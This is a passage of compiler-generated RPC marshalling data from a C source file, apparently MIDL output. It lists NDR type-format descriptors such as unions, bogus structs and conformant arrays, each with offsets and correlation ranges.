			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 2204 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 2206 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 2208 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 2210 */	0x0 ,
			0x0,		/* 0 */
/* 2212 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2216 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2220 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2222) */
/* 2222 */	NdrFcShort( 0x20 ),	/* 32 */
/* 2224 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2226 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2230 */	NdrFcShort( 0x2e ),	/* Offset= 46 (2276) */
/* 2232 */	NdrFcShort( 0xffff ),	/* Offset= -1 (2231) */
/* 2234 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 2236 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2238 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 2240 */	NdrFcShort( 0x4 ),	/* 4 */
/* 2242 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 2244 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 2246 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2250 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 2254 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 2258 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 2260 */	0x0 ,
			0x0,		/* 0 */
/* 2262 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2266 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2270 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 2272 */	NdrFcShort( 0xfb84 ),	/* Offset= -1148 (1124) */
/* 2274 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 2276 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2278 */	NdrFcShort( 0x20 ),	/* 32 */
/* 2280 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2282 */	NdrFcShort( 0xa ),	/* Offset= 10 (2292) */
/* 2284 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 2286 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 2288 */	0x0,		/* 0 */
			NdrFcShort( 0xf8c9 ),	/* Offset= -1847 (442) */
			0x5b,		/* FC_END */
/* 2292 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 2294 */	NdrFcShort( 0xffc4 ),	/* Offset= -60 (2234) */
/* 2296 */
			0x11, 0x0,	/* FC_RP */
/* 2298 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2300) */
/* 2300 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 2302 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 2304 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 2306 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 2308 */	0x0 ,
			0x0,		/* 0 */
/* 2310 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2314 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2318 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2320) */
/* 2320 */	NdrFcShort( 0x20 ),	/* 32 */
/* 2322 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2324 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2328 */	NdrFcShort( 0x38 ),	/* Offset= 56 (2384) */
/* 2330 */	NdrFcShort( 0xffff ),	/* Offset= -1 (2329) */
/* 2332 */	0xb7,		/* FC_RANGE */
			0xd,		/* 13 */
/* 2334 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2338 */	NdrFcLong( 0x7 ),	/* 7 */
/* 2342 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 2344 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2346 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 2348 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2350 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 2352 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 2354 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2358 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 2362 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 2366 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 2368 */	0x0 ,
			0x0,		/* 0 */
/* 2370 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2374 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2378 */
			0x12, 0x0,	/* FC_UP */
/* 2380 */	NdrFcShort( 0xf756 ),	/* Offset= -2218 (162) */
/* 2382 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 2384 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2386 */	NdrFcShort( 0x20 ),	/* 32 */
/* 2388 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2390 */	NdrFcShort( 0xc ),	/* Offset= 12 (2402) */
/* 2392 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 2394 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 2396 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 2398 */	NdrFcShort( 0xffbe ),	/* Offset= -66 (2332) */
/* 2400 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 2402 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 2404 */	NdrFcShort( 0xffc2 ),	/* Offset= -62 (2342) */
/* 2406 */
			0x12, 0x0,	/* FC_UP */
/* 2408 */	NdrFcShort( 0xf73a ),	/* Offset= -2246 (162) */
/* 2410 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 2412 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2414) */
/* 2414 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 2416 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 2418 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 2420 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 2422 */	0x0 ,
			0x0,		/* 0 */
/* 2424 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2428 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2432 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2434) */
/* 2434 */	NdrFcShort( 0x28 ),	/* 40 */
/* 2436 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2438 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2442 */	NdrFcShort( 0x6e ),	/* Offset= 110 (2552) */
/* 2444 */	NdrFcShort( 0xffff ),	/* Offset= -1 (2443) */
/* 2446 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 2448 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2450 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 2452 */	NdrFcShort( 0x4 ),	/* 4 */
/* 2454 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 2456 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 2458 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2462 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 2466 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 2470 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 2472 */	0x0 ,
			0x0,		/* 0 */
/* 2474 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2478 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2482 */
			0x12, 0x0,	/* FC_UP */
/* 2484 */	NdrFcShort( 0xf6ee ),	/* Offset= -2322 (162) */
/* 2486 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 2488 */
			0x1b,		/* FC_CARRAY */
			0x3,		/* 3 */
/* 2490 */	NdrFcShort( 0x4 ),	/* 4 */
/* 2492 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 2494 */	NdrFcShort( 0x4 ),	/* 4 */
/* 2496 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 2498 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 2500 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2504 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 2508 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 2510 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 2512 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2514 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 2516 */	NdrFcShort( 0x8 ),	/* 8 */
/* 2518 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 2520 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 2522 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2526 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 2530 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 2534 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 2536 */	0x0 ,
			0x0,		/* 0 */
/* 2538 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2542 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2546 */
			0x12, 0x0,	/* FC_UP */
/* 2548 */	NdrFcShort( 0xf68e ),	/* Offset= -2418 (130) */
/* 2550 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 2552 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2554 */	NdrFcShort( 0x28 ),	/* 40 */
/* 2556 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2558 */	NdrFcShort( 0xa ),	/* Offset= 10 (2568) */
/* 2560 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 2562 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 2564 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 2566 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 2568 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 2570 */	NdrFcShort( 0xff84 ),	/* Offset= -124 (2446) */
/* 2572 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 2574 */	NdrFcShort( 0xffaa ),	/* Offset= -86 (2488) */
/* 2576 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 2578 */	NdrFcShort( 0xffbc ),	/* Offset= -68 (2510) */
/* 2580 */
			0x11, 0x0,	/* FC_RP */
/* 2582 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2584) */
/* 2584 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 2586 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 2588 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 2590 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 2592 */	0x0 ,
			0x0,		/* 0 */
/* 2594 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2598 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2602 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2604) */
/* 2604 */	NdrFcShort( 0x40 ),	/* 64 */
/* 2606 */	NdrFcShort( 0x2 ),	/* 2 */
/* 2608 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2612 */	NdrFcShort( 0xa ),	/* Offset= 10 (2622) */
/* 2614 */	NdrFcLong( 0x2 ),	/* 2 */
/* 2618 */	NdrFcShort( 0x6c ),	/* Offset= 108 (2726) */
/* 2620 */	NdrFcShort( 0xffff ),	/* Offset= -1 (2619) */
/* 2622 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2624 */	NdrFcShort( 0x30 ),	/* 48 */
/* 2626 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2628 */	NdrFcShort( 0xc ),	/* Offset= 12 (2640) */
/* 2630 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 2632 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 2634 */	0x0,		/* 0 */
			NdrFcShort( 0xf76f ),	/* Offset= -2193 (442) */
			0x8,		/* FC_LONG */
/* 2638 */	0x40,		/* FC_STRUCTPAD4 */
			0x5b,		/* FC_END */
/* 2640 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 2642 */	0x2,		/* FC_CHAR */
			0x5c,		/* FC_PAD */
/* 2644 */
			0x12, 0x0,	/* FC_UP */
/* 2646 */	NdrFcShort( 0xfa0e ),	/* Offset= -1522 (1124) */
/* 2648 */
			0x12, 0x0,	/* FC_UP */
/* 2650 */	NdrFcShort( 0xf5b2 ),	/* Offset= -2638 (12) */
/* 2652 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2654 */	NdrFcShort( 0x10 ),	/* 16 */
/* 2656 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2658 */	NdrFcShort( 0x6 ),	/* Offset= 6 (2664) */
/* 2660 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 2662 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 2664 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 2666 */	NdrFcShort( 0xf6f0 ),	/* Offset= -2320 (346) */
/* 2668 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 2670 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2672 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 2674 */	NdrFcShort( 0x4 ),	/* 4 */
/* 2676 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 2678 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 2680 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2684 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 2688 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 2692 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 2694 */	0x0 ,
			0x0,		/* 0 */
/* 2696 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2700 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2704 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 2706 */	NdrFcShort( 0xffca ),	/* Offset= -54 (2652) */
/* 2708 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 2710 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2712 */	NdrFcShort( 0x10 ),	/* 16 */
/* 2714 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2716 */	NdrFcShort( 0x6 ),	/* Offset= 6 (2722) */
/* 2718 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 2720 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 2722 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 2724 */	NdrFcShort( 0xffc8 ),	/* Offset= -56 (2668) */
/* 2726 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2728 */	NdrFcShort( 0x40 ),	/* 64 */
/* 2730 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2732 */	NdrFcShort( 0xe ),	/* Offset= 14 (2746) */
/* 2734 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 2736 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 2738 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 2740 */	0x0,		/* 0 */
			NdrFcShort( 0xf705 ),	/* Offset= -2299 (442) */
			0x8,		/* FC_LONG */
/* 2744 */	0x40,		/* FC_STRUCTPAD4 */
			0x5b,		/* FC_END */
/* 2746 */
			0x12, 0x0,	/* FC_UP */
/* 2748 */	NdrFcShort( 0xf5e6 ),	/* Offset= -2586 (162) */
/* 2750 */
			0x12, 0x0,	/* FC_UP */
/* 2752 */	NdrFcShort( 0xf9a4 ),	/* Offset= -1628 (1124) */
/* 2754 */
			0x12, 0x0,	/* FC_UP */
/* 2756 */	NdrFcShort( 0xf5de ),	/* Offset= -2594 (162) */
/* 2758 */
			0x12, 0x0,	/* FC_UP */
/* 2760 */	NdrFcShort( 0xf5da ),	/* Offset= -2598 (162) */
/* 2762 */
			0x12, 0x0,	/* FC_UP */
/* 2764 */	NdrFcShort( 0xffca ),	/* Offset= -54 (2710) */
/* 2766 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 2768 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2770) */
/* 2770 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 2772 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 2774 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 2776 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 2778 */	0x0 ,
			0x0,		/* 0 */
/* 2780 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2784 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2788 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2790) */
/* 2790 */	NdrFcShort( 0x20 ),	/* 32 */
/* 2792 */	NdrFcShort( 0x2 ),	/* 2 */
/* 2794 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2798 */	NdrFcShort( 0xe ),	/* Offset= 14 (2812) */
/* 2800 */	NdrFcLong( 0x2 ),	/* 2 */
/* 2804 */	NdrFcShort( 0x20 ),	/* Offset= 32 (2836) */
/* 2806 */	NdrFcShort( 0xffff ),	/* Offset= -1 (2805) */
/* 2808 */
			0x12, 0x0,	/* FC_UP */
/* 2810 */	NdrFcShort( 0xf96a ),	/* Offset= -1686 (1124) */
/* 2812 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2814 */	NdrFcShort( 0x20 ),	/* 32 */
/* 2816 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2818 */	NdrFcShort( 0xa ),	/* Offset= 10 (2828) */
/* 2820 */	0x36,		/* FC_POINTER */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 2822 */	0x0,		/* 0 */
			NdrFcShort( 0xf6b3 ),	/* Offset= -2381 (442) */
			0x36,		/* FC_POINTER */
/* 2826 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 2828 */
			0x12, 0x10,	/* FC_UP [pointer_deref] */
/* 2830 */	NdrFcShort( 0xffea ),	/* Offset= -22 (2808) */
/* 2832 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 2834 */	0x8,		/* FC_LONG */
			0x5c,		/* FC_PAD */
/* 2836 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2838 */	NdrFcShort( 0x10 ),	/* 16 */
/* 2840 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2842 */	NdrFcShort( 0x6 ),	/* Offset= 6 (2848) */
/* 2844 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 2846 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 2848 */
			0x12, 0x0,	/* FC_UP */
/* 2850 */	NdrFcShort( 0xf580 ),	/* Offset= -2688 (162) */
/* 2852 */
			0x11, 0x0,	/* FC_RP */
/* 2854 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2856) */
/* 2856 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 2858 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 2860 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 2862 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 2864 */	0x0 ,
			0x0,		/* 0 */
/* 2866 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2870 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2874 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2876) */
/* 2876 */	NdrFcShort( 0x18 ),	/* 24 */
/* 2878 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2880 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2884 */	NdrFcShort( 0x1a ),	/* Offset= 26 (2910) */
/* 2886 */	NdrFcShort( 0xffff ),	/* Offset= -1 (2885) */
/* 2888 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 2890 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2892 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 2894 */	NdrFcShort( 0x8 ),	/* 8 */
/* 2896 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 2898 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 2900 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2904 */	NdrFcLong( 0xa00000 ),	/* 10485760 */
/* 2908 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 2910 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 2912 */	NdrFcShort( 0x18 ),	/* 24 */
/* 2914 */	NdrFcShort( 0x0 ),	/* 0 */
/* 2916 */	NdrFcShort( 0x8 ),	/* Offset= 8 (2924) */
/* 2918 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 2920 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 2922 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 2924 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 2926 */	NdrFcShort( 0xffda ),	/* Offset= -38 (2888) */
/* 2928 */
			0x11, 0x0,	/* FC_RP */
/* 2930 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2932) */
/* 2932 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 2934 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 2936 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 2938 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 2940 */	0x0 ,
			0x0,		/* 0 */
/* 2942 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2946 */	NdrFcLong( 0x0 ),	/* 0 */
/* 2950 */	NdrFcShort( 0x2 ),	/* Offset= 2 (2952) */
/* 2952 */	NdrFcShort( 0x50 ),	/* 80 */
/* 2954 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2956 */	NdrFcLong( 0x1 ),	/* 1 */
/* 2960 */	NdrFcShort( 0x4e ),	/* Offset= 78 (3038) */
/* 2962 */	NdrFcShort( 0xffff ),	/* Offset= -1 (2961) */
/* 2964 */
			0x15,		/* FC_STRUCT */
			0x7,		/* 7 */
/* 2966 */	NdrFcShort( 0x30 ),	/* 48 */
/* 2968 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 2970 */	NdrFcShort( 0xf6e0 ),	/* Offset= -2336 (634) */
/* 2972 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 2974 */	NdrFcShort( 0xf6dc ),	/* Offset= -2340 (634) */
/* 2976 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 2978 */	NdrFcShort( 0xf6d8 ),	/* Offset= -2344 (634) */
/* 2980 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 2982 */	NdrFcShort( 0xf6d4 ),	/* Offset= -2348 (634) */
/* 2984 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 2986 */	NdrFcShort( 0xf6d0 ),	/* Offset= -2352 (634) */
/* 2988 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 2990 */	NdrFcShort( 0xf6cc ),	/* Offset= -2356 (634) */
/* 2992 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 2994 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 2996 */	NdrFcShort( 0x1 ),	/* 1 */
/* 2998 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 3000 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3002 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 3004 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 3006 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3010 */	NdrFcLong( 0xa00000 ),	/* 10485760 */
/* 3014 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 3016 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 3018 */	NdrFcShort( 0x1 ),	/* 1 */
/* 3020 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 3022 */	NdrFcShort( 0x4 ),	/* 4 */
/* 3024 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 3026 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 3028 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3032 */	NdrFcLong( 0xa00000 ),	/* 10485760 */
/* 3036 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 3038 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x7,		/* 7 */
/* 3040 */	NdrFcShort( 0x50 ),	/* 80 */
/* 3042 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3044 */	NdrFcShort( 0xe ),	/* Offset= 14 (3058) */
/* 3046 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 3048 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 3050 */	NdrFcShort( 0xffaa ),	/* Offset= -86 (2964) */
/* 3052 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 3054 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 3056 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 3058 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 3060 */	NdrFcShort( 0xffbe ),	/* Offset= -66 (2994) */
/* 3062 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 3064 */	NdrFcShort( 0xffd0 ),	/* Offset= -48 (3016) */
/* 3066 */
			0x11, 0x0,	/* FC_RP */
/* 3068 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3070) */
/* 3070 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 3072 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 3074 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 3076 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 3078 */	0x0 ,
			0x0,		/* 0 */
/* 3080 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3084 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3088 */	NdrFcShort( 0x2 ),	/* Offset= 2 (3090) */
/* 3090 */	NdrFcShort( 0x20 ),	/* 32 */
/* 3092 */	NdrFcShort( 0x1 ),	/* 1 */
/* 3094 */	NdrFcLong( 0x1 ),	/* 1 */
/* 3098 */	NdrFcShort( 0x2e ),	/* Offset= 46 (3144) */
/* 3100 */	NdrFcShort( 0xffff ),	/* Offset= -1 (3099) */
/* 3102 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 3104 */	NdrFcShort( 0x0 ),	/* 0 */
/* 3106 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 3108 */	NdrFcShort( 0x14 ),	/* 20 */
/* 3110 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 3112 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 3114 */	NdrFcLong( 0x1 ),	/* 1 */
/* 3118 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 3122 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 3126 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 3128 */	0x0 ,
			0x0,		/* 0 */
/* 3130 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3134 */	NdrFcLong( 0x0 ),	/* 0 */
/* 3138 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 3140 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
